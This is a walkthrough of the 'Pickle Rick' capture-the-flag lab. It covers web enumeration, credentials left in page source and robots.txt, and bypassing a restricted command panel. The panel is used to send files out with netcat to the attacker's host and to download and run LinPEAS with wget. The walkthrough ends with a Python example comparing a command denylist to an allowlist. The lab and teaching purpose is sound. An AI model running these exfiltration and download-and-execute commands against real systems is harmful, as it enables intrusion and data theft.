
TryHackMe – Pickle Rick Walkthrough

Introduction

This was an easy Rick and Morty-themed Linux challenge that required exploiting a web server and using a web console for local enumeration to find the 3 ingredients Rick needs for the potion that will transform him from a pickle back into a human.

Enumeration

The first thing to do is to run a TCP Nmap scan against the 1000 most common ports, using the following flags:

  • -sC to run default scripts
  • -sV to enumerate application versions

The scan has identified two open ports: port 22 (SSH) and port 80 (HTTP). The next step will be to start enumerating HTTP.

Enumerating HTTP

The following page is displayed when accessing the web server through a browser:

When inspecting the source code of the page, a username is revealed:

The next step is to run a scan to find hidden files or directories using Gobuster, with the following flags:

  • dir to specify the scan should be done against directories and files
  • -u to specify the target URL
  • -w to specify the word list to use
  • -x to specify the extensions to enumerate
  • -t to specify the number of concurrent threads

Gobuster has identified a few interesting entries, one of which is /login.php. When navigating to it, a login page is displayed:

When accessing the robots.txt file, a piece of text, which later on turns out to be the password for the user found above, is found:

Authenticating to the login page using the username and password found earlier:

This leads to a “Command Panel” page, which allows running system commands:

The next steps will be to try and identify the ingredients required in the challenge.

First Ingredient

Although the portal allows executing Bash commands, only a limited number of commands are allowed:

When running ls -la, a “Sup3rS3cretPicl3Ingred.txt” file is found:

When accessing it through a browser, the first ingredient is displayed:

Second Ingredient

As seen above, the current folder also contains a “clue.txt” file, which suggests looking around the file system for other ingredients:

Using find to identify the second ingredient file:

find / -name '*ingredient*' 2>/dev/null

A “second ingredients” file is found under /home/rick. When executing ls -la against the file, it appears that all users can read it:

It appears that commands that read the contents of files, such as cat, are not allowed:

Netcat can be used to send the contents of the file to the local Kali host. A listener is set up there using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

Running the following command to send the contents of the file to the Netcat listener:

nc 10.4.36.186 443 < '/home/rick/second ingredients'

The contents of the file containing the second ingredient were received:

Third Ingredient

Setting up a Python Simple HTTP Server to host the LinPEAS enumeration script:

Executing the following command to download LinPEAS, save it to /tmp and assign execute permissions to it:

wget 10.4.36.186/linpeas.sh -O /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh

The request was received:

Using the following command to execute the script and save its output to /tmp/linpeas.txt:

/tmp/linpeas.sh > /tmp/linpeas.txt

Setting a Netcat listener to receive the output of LinPEAS, using the following flags:

  • -l to listen for incoming connections
  • -v for verbose output
  • -n to skip the DNS lookup
  • -p to specify the port to listen on

Using the following command to send the output of LinPEAS to the Netcat listener:

nc 10.4.36.186 443 < /tmp/linpeas.txt

The output of the script was received on the Netcat listener:

It appears that a Sudo rule is present on the machine that allows the current user to execute all commands as root:

Listing existing files and folders in the /root directory:

sudo ls -la /root/

A “3rd.txt” file is found. Copying it to the current directory and making it world-readable (the copy is owned by root, so chmod also needs sudo):

sudo cp /root/3rd.txt /var/www/html/ && sudo chmod 777 3rd.txt

Accessing it through a browser:

Conclusion

This was an interesting challenge, as it was necessary to work around the restrictions of the web console by using alternative commands to find and read the required ingredients.
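
The console's restrictions behave like a command denylist, which is why the alternative commands above got through. The following added example (not the room's actual code; DENYLIST, ALLOWED and the function names are assumptions) runs the walkthrough's commands through a word denylist and through an allowlist that never invokes a shell:

```python
import shlex

# Assumption: the panel rejects commands containing these file-reading words.
DENYLIST = {"cat", "head", "tail", "more", "less", "vi", "vim", "nano"}

# Hardened alternative (hypothetical policy): program -> permitted options.
ALLOWED = {"ls": {"-l", "-a", "-la"}, "whoami": set(), "id": set()}
SHELL_META = set("<>|&;$`(){}*?\\\n")

def denylist_permits(command: str) -> bool:
    """Weak filter: block only when a denylisted word appears."""
    return not any(word in DENYLIST for word in command.split())

def allowlist_argv(command: str):
    """Return an argv list to run without a shell, or None if rejected."""
    if any(ch in SHELL_META for ch in command):
        return None  # redirection, chaining and globbing never reach a shell
    try:
        argv = shlex.split(command)
    except ValueError:  # unbalanced quotes
        return None
    if not argv or argv[0] not in ALLOWED:
        return None
    for arg in argv[1:]:
        if arg.startswith("-"):
            if arg not in ALLOWED[argv[0]]:
                return None
        elif arg.startswith("/") or ".." in arg.split("/"):
            return None  # operands stay inside the working directory
    return argv

# Commands from the walkthrough; the cat line is constructed.
WALKTHROUGH = [
    "ls -la",
    "cat clue.txt",
    "nc 10.4.36.186 443 < '/home/rick/second ingredients'",
    "wget 10.4.36.186/linpeas.sh -O /tmp/linpeas.sh && chmod +x /tmp/linpeas.sh",
    "sudo ls -la /root/",
]

def compare(commands):
    """(command, passes denylist, passes allowlist) for each command."""
    return [(c, denylist_permits(c), allowlist_argv(c) is not None) for c in commands]

if __name__ == "__main__":
    for cmd, weak, strict in compare(WALKTHROUGH):
        print(f"denylist={weak!s:5} allowlist={strict!s:5} {cmd}")
```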